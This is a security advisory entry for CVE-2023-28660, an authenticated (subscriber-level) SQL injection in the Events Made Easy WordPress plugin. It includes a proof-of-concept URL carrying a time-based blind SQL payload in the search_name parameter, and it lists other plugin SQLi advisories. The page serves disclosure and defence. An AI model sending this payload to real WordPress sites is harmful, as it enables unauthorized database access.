Events Made Easy <= 2.3.14 – Subscriber+ SQLi | CVE 2023-28660 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the search_name parameter before using it in a SQL statement via the eme_recurrences_list AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Proof of Concept

Open the URL below while being on the blog as subscriber user

https://example.com/wp-admin/admin-ajax.php?action=eme_recurrences_list&search_name=1'{+}AND{+}(SELECT+1+FROM+(SELECT(SLEEP(0.5)))a)-{-}+{-}

Affects Plugins

events-made-easy

No known fix

References

CVE

URL

https://www.tenable.com/security/research/tra-2023-2

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Joshua Martinelle (Tenable Research)

Verified

No

WPVDB ID

6db977aa-82db-49c2-9a42-00b519017bc0

Timeline

Publicly Published

2023-03-22 (about 3 years ago)

Added

2023-03-23 (about 3 years ago)

Last Updated

2023-03-23 (about 3 years ago)

Other

Published

Title

Published

2023-12-27

Title

WebinarIgnition < 3.05.1 - Unauthenticated SQL Injection

Published

2024-08-19

Title

Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder 2.0 - 2.13.9 - Authenticated (Administrator+) SQL Injection via getLogHistory Function

Published

2023-10-31

Title

LearnDash LMS < 4.5.3.1 - SQL Injection

Published

2024-09-30

Title

YITH WooCommerce Ajax Search < 2.8.1 - Unauthenticated SQL Injection

Published

2025-05-16

Title

Chameleon HTML5 Audio Player With/Without Playlist <= 3.5.6 - Authenticated (Contributor+) SQL Injection